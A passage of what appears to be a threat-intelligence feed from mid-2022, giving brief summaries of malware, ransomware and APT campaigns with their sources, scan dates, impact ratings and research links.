- CERT-UA has analysed a phishing email containing a malicious document attachment related to the National Academy of Security of Ukraine. The document contains an HTM dropper, the activation of which leads to the creation of a RAR archive file and then an LNK file; running the LNK file leads to the download and execution of an HTA file.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- IcedID_malware_leveraging_Cobalt_Strike_and_Dark_VNC
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- The researcher from ISC SANS provides an analysis of IcedID malware activity involving Dark VNC and Cobalt Strike.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0100_Group_leveraging_phishing_sites_to_target_Ukrainian_Banks
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- CERT-UA has discovered an online fraud scheme using phishing sites with the subject line “aid from the Red Cross”, which is targeting popular Ukrainian banks.
—
- Intel Source:
- Yoroi ZLab
- Intel Name:
- Diving_Deep_into_Hive_Ransomware
- Date of Scan:
- 2022-07-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Yoroi ZLab took a deep dive into Hive ransomware and identified it as one of the most sophisticated active threats. They are also tracking this infamous threat actor and observing any modifications in its techniques in order to provide guidelines.
Source:
https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/?&web_view=true
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0041_Group_distributing_Formbook_and_Snake_Keylogger
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email containing a malicious document attachment related to a “Final payment”. The document contains an EXE file classified as the RelicRace .NET downloader, the activation of which leads to the running of the payload.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Similarities_between_LockBit_3_0_and_BlackMatter_ransomware
- Date of Scan:
- 2022-07-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro found similarities between the new version of LockBit and BlackMatter ransomware. LockBit’s extensive similarities to BlackMatter come from overlaps in the privilege escalation and harvesting routines used to identify APIs.
—
- Intel Source:
- Sophos
- Intel Name:
- Attacks_against_a_pair_of_vulnerabilities_in_Microsoft_SQL
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- Sophos Managed Threat Response (MTR) and Sophos Rapid Response have been investigating attacks against Microsoft SQL Server installations. Sophos observed this threat group targeting externally exposed and unpatched SQL servers, and during their initial investigations into the group they saw it leveraging malware infrastructure impersonating a download site for KMSAuto, a non-malicious software utility used for evading Windows license key activation.
Source:
https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/
—
- Intel Source:
- Securelist
- Intel Name:
- A_New_CosmicStrand_UEFI_Firmware_Rootkit
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- A sophisticated UEFI firmware rootkit has been developed by an unknown Chinese-speaking threat actor, according to security firm Kaspersky. The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and Kaspersky noticed that all these images are related to designs using the H81 chipset.
Source:
https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/
—
- Intel Source:
- Cyble
- Intel Name:
- The_Source_Code_of_Luca_Stealer_Malware_Leaked
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- The Cyble Threat Hunting team recently discovered an unknown Rust-based stealer, which is known as Luca Stealer, and the source code of this stealer was leaked on a popular cybercrime forum for free on July 3, 2022.
Source:
https://blog.cyble.com/2022/07/25/luca-stealer-source-code-leaked-on-a-cybercrime-forum/
—
- Intel Source:
- PWC
- Intel Name:
- New_tool_by_Charming_Kitten_and_its_OPSEC_errors
- Date of Scan:
- 2022-07-26
- Impact:
- MEDIUM
- Summary:
- PwC researchers analyzed the activity of the Yellow Garuda threat actor, aka Charming Kitten, and found that it has come up with new tools; they also identified its operational security errors.
Source:
https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html
—
- Intel Source:
- Avast
- Intel Name:
- Candiru_Spyware_exploiting_Chrome_Zero_days_in_Middle_East
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Avast researchers discovered a zero-day vulnerability in Google Chrome, which has since been fixed. The vulnerability was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.
Source:
https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/
—
- Intel Source:
- NoLogs NoBreach
- Intel Name:
- Dot_PLAY_Ransomware
- Date of Scan:
- 2022-07-25
- Impact:
- MEDIUM
- Summary:
- A threat researcher has identified a new ransomware variant, called .PLAY ransomware, during an IR engagement. The researcher confirms that initial access was gained by exploiting Fortigate firewall vulnerabilities over the Fortigate SSL-VPN; after initial access, the threat actors achieved privilege escalation and ransomware deployment in less than 24 hours. Moreover, no C2 traffic or tooling was detected: all actions were carried out over the VPN and through RDP.
Source:
https://nologs-nobreach.com/2022/07/24/play-ransomware/
—
- Intel Source:
- Cyble
- Intel Name:
- Qakbot_continue_with_New_Techniques
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Researchers from Cyble Labs came across a Twitter post in which a user shared new IOCs related to the well-known Qakbot malware.
Source:
https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_started_using_Windows_installer_package_file
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that Magniber ransomware has started using a Windows installer package file (.msi) instead of an IE browser vulnerability for its distribution.
—
- Intel Source:
- Securonix
- Intel Name:
- North_Korean_linked_APT37_group_attack_with_Konni_RAT_malware
- Date of Scan:
- 2022-07-25
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs is investigating a new attack campaign exploiting high-value targets, including North Korea, which could be linked to a North Korean cyber-espionage group (APT37).
Source:
https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/
—
- Intel Source:
- ASEC
- Intel Name:
- Attackers_targeting_unpatched_Atlassian_Confluence_Servers
- Date of Scan:
- 2022-07-25
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have found that attackers are targeting vulnerable servers which have not been patched. They exploit RCE vulnerabilities and, if successful, can install a web shell or malware to gain control of the infected system.
—
- Intel Source:
- ASEC
- Intel Name:
- IcedID_malware_spreading_through_ISO_files
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that the IcedID banking malware is being distributed with the help of ISO files. They discovered two methods: the first uses the Bumblebee malware and the second uses script files and cmd commands.
—
- Intel Source:
- AdvIntel
- Intel Name:
- Costa_Rican_Government_hacked_by_Conti_Ransomware
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- AdvIntel researchers uncovered how Conti ransomware hacked and encrypted the Costa Rican government, tracing the Russian hackers’ steps from an initial foothold to the exfiltration of 672GB of data on April 15.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- GoMet_2_0_backdoor_attacks_Ukraine
- Date of Scan:
- 2022-07-24
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has discovered a modified piece of malware targeting Ukraine and confirmed that the malware is a slightly modified version of the open-source backdoor named “GoMet2”.
Source:
https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html
—
- Intel Source:
- MalwareBytes
- Intel Name:
- A_malvertising_chain_abusing_Google_s_ad_network
- Date of Scan:
- 2022-07-24
- Impact:
- LOW
- Summary:
- Malwarebytes researchers uncovered a malvertising chain abusing Google’s ad network to redirect visitors to an infrastructure of tech support scams. Unsuspecting users searching for popular keywords will click an advert and their browser will get hijacked with fake warnings urging them to call rogue Microsoft agents for support.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_changing_its_Injection_Method
- Date of Scan:
- 2022-07-22
- Impact:
- LOW
- Summary:
- ASEC researchers constantly monitor Magniber ransomware and recently found that it is changing its injection method and has started being distributed as a Windows installer package file (.msi) via the Edge and Chrome browsers.
—
- Intel Source:
- ProofPoint
- Intel Name:
- TA4563_leverages_EvilNum_malware_to_target_European_financial_entities
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have tracked a threat actor, which they named TA4563, that has been leveraging EvilNum malware to target European financial and investment entities.
—
- Intel Source:
- Sentinelone
- Intel Name:
- LockBit_3_0_updated_with_new_techniques
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs have detected new techniques and features in LockBit 3.0. The group is updating its encryption routines and adding several new features.
—
- Intel Source:
- Mandiant
- Intel Name:
- CNMF_Discloses_Malware_in_Ukraine
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Mandiant shared in their blog new malicious activity targeting Ukrainian entities during the ongoing conflict. They highlighted the operations of suspected UNC1151 and suspected UNC2589, which send phishing emails with malicious documents leading to malware infection chains.
Source:
https://www.mandiant.com/resources/spear-phish-ukrainian-entities
—
- Intel Source:
- Intezer
- Intel Name:
- Lightning_Framework_A_new_Linux_centric_malware
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Researchers at Intezer have detected a new, previously undetected Swiss Army Knife-like Linux malware called Lightning Framework.
Source:
https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/
—
- Intel Source:
- ASEC
- Intel Name:
- SmokeLoader_malware_leveraging_Amadey_Bot
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- ASEC researchers discovered that Amadey Bot is being installed by SmokeLoader. Amadey Bot is capable of stealing information and installing additional malware by receiving commands from the attacker, while SmokeLoader is a downloader used to install additional malware strains.
—
- Intel Source:
- Cert-UA
- Intel Name:
- Threat_actors_leveraging_AgentTesla_to_target_Ukraine_state_bodies
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- CERT-UA discovered the file “Report_050722_4.ppt”, which contains a thumbnail image that mentions the operational command “South”. In the case of opening the document and activating the macro, the latter will ensure the creation of the files “gksg023ig.lnk” and “sgegkseg23mjl.exe”, as well as the execution of the LNK file using rundll32.exe, which in turn will lead to the launch of the mentioned EXE file.
—
- Intel Source:
- Google blog
- Intel Name:
- Continued_cyber_activity_in_Eastern_Europe
- Date of Scan:
- 2022-07-21
- Impact:
- MEDIUM
- Summary:
- Google’s Threat Analysis Group (TAG) continues to closely monitor Russian APT activity outside of Ukraine. TAG has disrupted coordinated influence operations from several actors, including the Internet Research Agency and a Russian consulting firm, and also reports on the Turla, COLDRIVER and Ghostwriter/UNC1151 groups and on use of the Follina vulnerability.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Analysis_of_NukeSped_Malware
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- Researchers at Cyfirma analyzed NukeSped malware. The malware is associated with the North Korean APT group Lazarus, which is known to target the US, South Korea, Japan and Asia Pacific countries.
Source:
https://www.cyfirma.com/outofband/nukesped-rat-report/
—
- Intel Source:
- WeLivesecurity
- Intel Name:
- CloudMensis_spyware_targets_MacOS_systems
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2.
Source:
https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
https://www.jamf.com/blog/cloudmensis-malware/
—
- Intel Source:
- Cyble
- Intel Name:
- Redeemer_Ransomware_released_new_version_Redeemer_2_0
- Date of Scan:
- 2022-07-21
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble have identified the latest version of Redeemer ransomware on dark web cybercrime forums. The author of Redeemer ransomware released a new version with updated features.
—
- Intel Source:
- Fortinet
- Intel Name:
- A_new_variant_of_QakBot
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- Fortinet’s researchers observed a phishing email, part of a phishing campaign spreading a new variant of QakBot.
—
- Intel Source:
- ISC SANS
- Intel Name:
- PyAutoGUI_lets_your_Python_scripts_control_the_mouse_and_keyboard
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- PyAutoGUI lets malicious Python scripts control the mouse and keyboard to automate interactions with other applications.
Source:
https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860
—
- Intel Source:
- BitDefender
- Intel Name:
- Industrial_Espionage_Operation_explained
- Date of Scan:
- 2022-07-20
- Impact:
- MEDIUM
- Summary:
- Researchers from BitDefender analyzed an incident which was an industrial Espionage operation. In this attack the attacker managed to compromise a Patient Zero computer and used it to establish a secondary access avenue through a web shell planted on the company’s Exchange Server.
—
- Intel Source:
- Lacework
- Intel Name:
- WatchDog_Adds_Steganography_in_Cryptojacking_Operations
- Date of Scan:
- 2022-07-20
- Impact:
- LOW
- Summary:
- Researchers from Lacework reported that WatchDog’s cryptojacking campaign has adopted a unique steganography technique for malware propagation and other objectives. The XMRig miner was disguised as an image and hosted on compromised cloud storage (Alibaba Object Storage Service).
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Open_Document_malware_targets_Latin_American_Hotels
- Date of Scan:
- 2022-07-20
- Impact:
- LOW
- Summary:
- Researchers from HP Wolf Security analyzed a stealthy malware campaign which uses OpenDocument text (.odt) files to distribute malware. The campaign targets the hotel industry in Latin America.
—
- Intel Source:
- Sentinelone
- Intel Name:
- 8220_Gang_Massively_Expands_Cloud_Botnet
- Date of Scan:
- 2022-07-20
- Impact:
- MEDIUM
- Summary:
- Over the last month a crimeware group best known as 8220 Gang has expanded their botnet to roughly 30,000 hosts globally through the use of Linux and common cloud application vulnerabilities and poorly secured configurations.
—
- Intel Source:
- Palo Alto
- Intel Name:
- APT29_Group_leveraging_Online_Storage_Services
- Date of Scan:
- 2022-07-19
- Impact:
- MEDIUM
- Summary:
- Palo Alto researchers noticed Russian SVR hackers using Google Drive and Dropbox to evade detection. APT29 has adopted this new tactic in recent campaigns targeting Western diplomatic missions and foreign embassies worldwide.
Source:
https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/
—
- Intel Source:
- Resecurity
- Intel Name:
- Attackers_leveraging_tools_to_generate_LNK_Files_to_deliver_payload
- Date of Scan:
- 2022-07-19
- Impact:
- LOW
- Summary:
- Threat Hunters from Resecurity have detected popular tools used by cybercriminals. Attackers are actively leveraging tools allowing them to generate malicious shortcut files (.LNK files) for payload delivery.
—
- Intel Source:
- CISA
- Intel Name:
- A_continued_exploitation_of_Log4Shell_in_VMware_Horizon_Systems
- Date of Scan:
- 2022-07-19
- Impact:
- MEDIUM
- Summary:
- CISA has updated the Cybersecurity Advisory AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon, originally released June 23, 2022. The advisory now includes updated IOCs provided in Malware Analysis Report (MAR)-10382580-2.
—
- Intel Source:
- Citizen Lab
- Intel Name:
- Pegasus_Spyware_Used_Against_Thailand_s_Pro_Democracy_Movement
- Date of Scan:
- 2022-07-19
- Impact:
- LOW
- Summary:
- Citizen Lab discovered an extensive espionage campaign targeting Thai pro-democracy protesters and activists calling for reforms to the monarchy.
—
- Intel Source:
- Weixin
- Intel Name:
- Lazarus_Forged_Analysis_Report_on_Ecommerce_Component_Attack_Activities
- Date of Scan:
- 2022-07-19
- Impact:
- MEDIUM
- Summary:
- The APT-C-26 (Lazarus) organization has a clear purpose in this attack. It continues its attack activity by disguising itself as an Alibaba-related component. The payload component is related to the NukeSped family.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Elastix_VoIP_systems_hacked_in_massive_campaign
- Date of Scan:
- 2022-07-18
- Impact:
- LOW
- Summary:
- Recently, Palo Alto Unit 42 observed another operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target’s Digium phone software (a FreePBX module written in PHP).
Source:
https://unit42.paloaltonetworks.com/digium-phones-web-shell/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Phishing_campaign_involving_Emotet
- Date of Scan:
- 2022-07-18
- Impact:
- LOW
- Summary:
- Cyfirma researchers noticed multiple phishing campaigns involving Emotet, which is dropped through an Excel 4.0 (.xls) file attachment.
—
- Intel Source:
- Cloudsek
- Intel Name:
- The_Newly_Emerged_BlueSky_Ransomware
- Date of Scan:
- 2022-07-16
- Impact:
- MEDIUM
- Summary:
- CloudSEK discovered a financially motivated ransomware group, dubbed BlueSky, speculated to be connected to the Conti ransomware group.
—
- Intel Source:
- Qianxin Blog
- Intel Name:
- The_Maha_grass_group_attack_activity_against_Pakistan
- Date of Scan:
- 2022-07-16
- Impact:
- LOW
- Summary:
- Recently the Red Raindrop team of Qi’anxin Threat Intelligence Center observed several attack samples from the organization during daily threat hunting. In this attack, the attacker uses an RTF file exploiting a vulnerability to carry out a spear-phishing attack.
—
- Intel Source:
- Wordfence
- Intel Name:
- Sudden_Increase_In_Attacks_On_Modern_WPBakery_Page_Builder_Addons_Vulnerability
- Date of Scan:
- 2022-07-16
- Impact:
- LOW
- Summary:
- The Wordfence Threat Intelligence team has observed a spike in attack attempts targeting Kaswara Modern WPBakery Page Builder Addons. This ongoing campaign aims to take advantage of an arbitrary file upload vulnerability, tracked as CVE-2021-24284, which was previously disclosed and has not been patched in the now closed plugin.
Source:
https://www.wordfence.com/blog/2022/07/attacks-on-modern-wpbakery-page-builder-addons-vulnerability/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0100_group_leveraging_Online_Fraud_to_target_Ukraine
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- CERT-UA has discovered fraudulent pages on Facebook containing links to a “Unified Compensation Center for the Return of Unpaid Funds”. The fraudulent pages prompt users to provide personal information and make payments, harvesting payment card information in the process.
—
- Intel Source:
- Antiy Group
- Intel Name:
- Indian_APT_group_Confucius_targets_Pakistan_government_and_military_institutions
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- Antiy Group researchers published their findings on Indian APT Confucius campaigns targeting the Pakistani government and military institutions.
—
- Intel Source:
- Cyble
- Intel Name:
- ApolloRat_Malware_compiled_using_Nuitka
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- The Cyble research team has discovered a new RAT dubbed ApolloRAT. It is written in Python and uses Discord as its Command and Control (C&C) server.
Source:
https://blog.cyble.com/2022/07/14/apollorat-evasive-malware-compiled-using-nuitka/
—
- Intel Source:
- NCC Group
- Intel Name:
- Everest_Ransomware_new_TTPs_and_relation_to_Black_Byte
- Date of Scan:
- 2022-07-15
- Impact:
- MEDIUM
- Summary:
- Researchers at NCC Group analysed an Everest ransomware file and assess with medium confidence that Everest ransomware is related to BlackByte. They also documented new TTPs employed by the Everest ransomware group.
Source:
https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/
—
- Intel Source:
- Microsoft
- Intel Name:
- North_Korean_threat_actors_uses_H0lyGh0st_ransomware
- Date of Scan:
- 2022-07-15
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center has tracked a threat group, DEV-0530, which is using H0lyGh0st ransomware to target small and midsize businesses.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New_campaign_ongoing_by_Transparent_Tribe_APT_group
- Date of Scan:
- 2022-07-15
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos have discovered a malicious campaign targeting students of universities and colleges in India. This also suggests that the APT is actively expanding its network of victims to include civilian users.
Source:
https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html
—
- Intel Source:
- Cyble
- Intel Name:
- NoMercy_Stealer_Rapidly_Evolving_Into_Clipper_Malware
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Cyble threat hunters, during routine threat hunting exercises, discovered a new stealer named “NoMercy”. The investigation indicated that the stealer is a very crude and simple information stealer in its initial stages, and that the TAs behind it are actively modifying the stealer and adding additional capabilities.
Source:
https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/
—
- Intel Source:
- Security Affairs
- Intel Name:
- A_cryptomining_campaign_targets_Linux_servers
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Microsoft Security Intelligence experts are warning of a long-running campaign conducted by a cloud threat actor group, tracked as 8220, that is now targeting Linux servers to install crypto miners.
—
- Intel Source:
- Intezer
- Intel Name:
- Orbit_Malware_targeting_Linux_goes_undetected
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Intezer researchers provided technical analysis of a new and fully undetected malware dubbed “Orbit” that is targeting Linux systems. This malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands.
Source:
https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Phishing_tax_scam_at_Canada
- Date of Scan:
- 2022-07-07
- Impact:
- LOW
- Summary:
- Phishing scammers pose as the Canadian tax agency before Canada Day.
Source:
https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Threat_Actors_abusing_Red_teaming_tools
- Date of Scan:
- 2022-07-07
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit 42 recently hunted for and discovered new samples that match known advanced persistent threat (APT) patterns and tactics. These samples were evaluated and raised obvious detection concerns. The sample contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market.
Source:
https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/
—
- Intel Source:
- CISA
- Intel Name:
- NorthKorean_Threat_actors_uses_Maui_Ransomware
- Date of Scan:
- 2022-07-07
- Impact:
- MEDIUM
- Summary:
- A joint CSA has been released by the FBI, CISA and DOT about Maui ransomware being used by North Korean threat actors to target the Healthcare and Public Health Sector.
—
- Intel Source:
- ASEC
- Intel Name:
- Cobalt_Strike_and_Meterpreter
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- Researchers from ASEC analyzed an attack case that installs Cobalt Strike and Meterpreter on vulnerable MS-SQL servers to gain control. The attacker then installs AnyDesk to control the infected system in a remote desktop environment.
—
- Intel Source:
- SecuInfra
- Intel Name:
- Bitter_APT_targets_Bangladesh
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- Researchers from SecuInfra analyzed an attack by the Bitter APT group, which has targeted military organizations of Bangladesh.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- DarkComet_RAT_returned_with_new_TTPs
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- Researchers from SocInvestigation documented the new TTPs of DarkComet RAT, along with its detection and response. Generally, DarkComet is spread via phishing campaigns.
Source:
https://www.socinvestigation.com/darkcomet-rat-returns-with-new-ttps-detection-response/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_NPM_Packages_Stealing_Data
- Date of Scan:
- 2022-07-06
- Impact:
- LOW
- Summary:
- ReversingLabs researchers uncovered malicious NPM packages stealing data, as evidence of a widespread software supply chain attack.
—
- Intel Source:
- Securonix
- Intel Name:
- Diving_deep_into_BumbleBee_Loader_updated_IOCs
- Date of Scan:
- 2022-07-06
- Impact:
- MEDIUM
- Summary:
- The Securonix Threat Labs Threat Research Team has analysed a sample of BumbleBee; it appears to follow a similar delivery mechanism, which can be used to detect the initial foothold of the loader. Currently, AV detection of the BumbleBee loader is very weak as vendors work to update their signatures and heuristic detections, and the main DLL payload of this loader is very much capable of evading EDR detection at the time of publication.
—
- Intel Source:
- Microsoft
- Intel Name:
- The_new_Hive_variant
- Date of Scan:
- 2022-07-06
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center discovered the new variant while analyzing detected Hive ransomware techniques for dropping .key files.
Source:
https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/
—
- Intel Source:
- JPCERT
- Intel Name:
- Vsingle_Malware_used_by_Lazarus_Group
- Date of Scan:
- 2022-07-05
- Impact:
- MEDIUM
- Summary:
- Researchers from JPCERT detailed the VSingle malware used by the Lazarus group, which has been updated to retrieve C2 server information from GitHub.
—
- Intel Source:
- Cyble
- Intel Name:
- Xloader_Malware_returns_with_new_infection_technique
- Date of Scan:
- 2022-07-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble have analysed an infection chain of the Xloader malware. The malware uses multiple file types such as PDF, XLSX, and RTF for its initial infection and execution. It is also designed to drop three modules in memory and execute the final payload using the process-hollowing technique.
Source:
https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/
—
- Intel Source:
- Inquest
- Intel Name:
- GlowSand_Campaign
- Date of Scan:
- 2022-07-04
- Impact:
- LOW
- Summary:
- Researchers at InQuest have analysed a multistage malicious document masquerading as a Ukrainian military payroll document. The document was obfuscated and geofenced to infect only systems in Ukraine.
—
- Intel Source:
- CISA
- Intel Name:
- MedusaLocker_Ransomware
- Date of Scan:
- 2022-07-04
- Impact:
- MEDIUM
- Summary:
- CISA, the FBI, Treasury and FinCEN released a joint advisory in support of the #StopRansomware campaign, providing information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks.
—
- Intel Source:
- Intezer
- Intel Name:
- YTStealer_Malware
- Date of Scan:
- 2022-07-04
- Impact:
- LOW
- Summary:
- YTStealer is a malware family that aims to steal YouTube authentication cookies. As a stealer, it behaves much like many other stealers.
Source:
https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/
—
- Intel Source:
- SecureList
- Intel Name:
- SessionManager_IIS_backdoor
- Date of Scan:
- 2022-07-04
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureList have been investigating an IIS backdoor called SessionManager since early 2022. SessionManager has been used against NGOs, government, military and industrial organizations in Africa, South America, Asia, Europe, Russia and the Middle East, starting from at least March 2021.
Source:
https://securelist.com/the-sessionmanager-iis-backdoor/106868/
—
- Intel Source:
- Google blog
- Intel Name:
- Countering_hack_for_hire_attacker_groups
- Date of Scan:
- 2022-07-01
- Impact:
- LOW
- Summary:
- Google’s Threat Analysis Group (TAG) disclosed on Thursday that it had blocked as many as 36 malicious domains operated by hack-for-hire groups from India, Russia, and the U.A.E. Hack-for-hire groups have been observed targeting human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.
Source:
https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/
—
- Intel Source:
- Cyble
- Intel Name:
- PennyWise_Infostealer_leveraging_YouTube_to_infect_users
- Date of Scan:
- 2022-07-01
- Impact:
- LOW
- Summary:
- During a threat hunting exercise, researchers discovered a new stealer named “PennyWise”. The stealer appears to have been developed recently. The investigation indicated that the stealer is an emerging threat, and the researchers witnessed multiple samples of it active in the wild.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Black_Basta_Ransomware_gang_added_Qakbot_and_PrintNightmare_Exploit_to_their_Arsenal
- Date of Scan:
- 2022-06-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro identified the Black Basta ransomware group using the banking trojan QakBot as a means of entry and lateral movement, and taking advantage of the PrintNightmare vulnerability to perform privileged file operations.
—
- Intel Source:
- Lumen blog
- Intel Name:
- New_ZuoRAT_malware_targets_SOHO_router
- Date of Scan:
- 2022-06-30
- Impact:
- LOW
- Summary:
- Black Lotus Labs, the threat intelligence arm of Lumen Technologies, has identified and is tracking a new and sophisticated multistage remote access trojan (RAT) that leverages infected SOHO routers to target predominantly North American and European networks of interest. The trojan grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications, maintaining an undetected foothold.
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_Stealer_v2
- Date of Scan:
- 2022-06-30
- Impact:
- LOW
- Summary:
- Researchers observed this week that cyber criminals are using a new and improved version of the prolific Raccoon Stealer malware, barely three months after its authors announced they were quitting.
Source:
https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
—
- Intel Source:
- NetSkope
- Intel Name:
- Emotet_still_abusing_Microsoft_Office_Macros
- Date of Scan:
- 2022-06-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope Threat Labs have analysed a campaign in which Emotet is still being executed using malicious Microsoft Office documents. Despite the protection Microsoft released in 2022 to prevent the execution of Excel 4.0 (XLM) macros, this attack is still feasible against users running outdated versions of Office.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- AstraLocker_2.0_Ransomware_distributed_from_Microsoft_Word_files
- Date of Scan:
- 2022-06-29
- Impact:
- MEDIUM
- Summary:
- Researchers at ReversingLabs have discovered a new version of the AstraLocker ransomware (AstraLocker 2.0) that is being distributed directly from Microsoft Office files used as bait in phishing attacks.
—
- Intel Source:
- Fortinet
- Intel Name:
- Ukraine_targeted_by_Dark_Crystal_RAT_or_DCRat
- Date of Scan:
- 2022-06-29
- Impact:
- LOW
- Summary:
- Researchers at FortiGuard Labs came across another file that was likely used in the attack campaign described by CERT-UA; the file's VirusTotal submission date and its submission location (Ukraine) are consistent with that campaign. Unlike the docx file that exploited CVE-2022-30190 (Follina), the new file is in Excel (xlsx) format and contains malicious macros.
Source:
https://www.fortinet.com/blog/threat-research/ukraine-targeted-by-dark-crystal-rat
—
- Intel Source:
- Zscaler
- Intel Name:
- Evilnum_APT_returns_with_new_Threat_and_TTPs
- Date of Scan:
- 2022-06-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscaler have been tracking the Evilnum APT group since the start of 2022 and have this time seen a newer target list and TTPs. The main distribution vector used by this threat group was Windows Shortcut files (LNK) sent inside malicious archive files (ZIP) as email attachments in spear phishing emails to the victims.
Source:
https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets
—
- Intel Source:
- Kaspersky ICS CERT
- Intel Name:
- ShadowPad_backdoor_and_MS_Exchange_bug_leveraged_to_attack_ICS
- Date of Scan:
- 2022-06-28
- Impact:
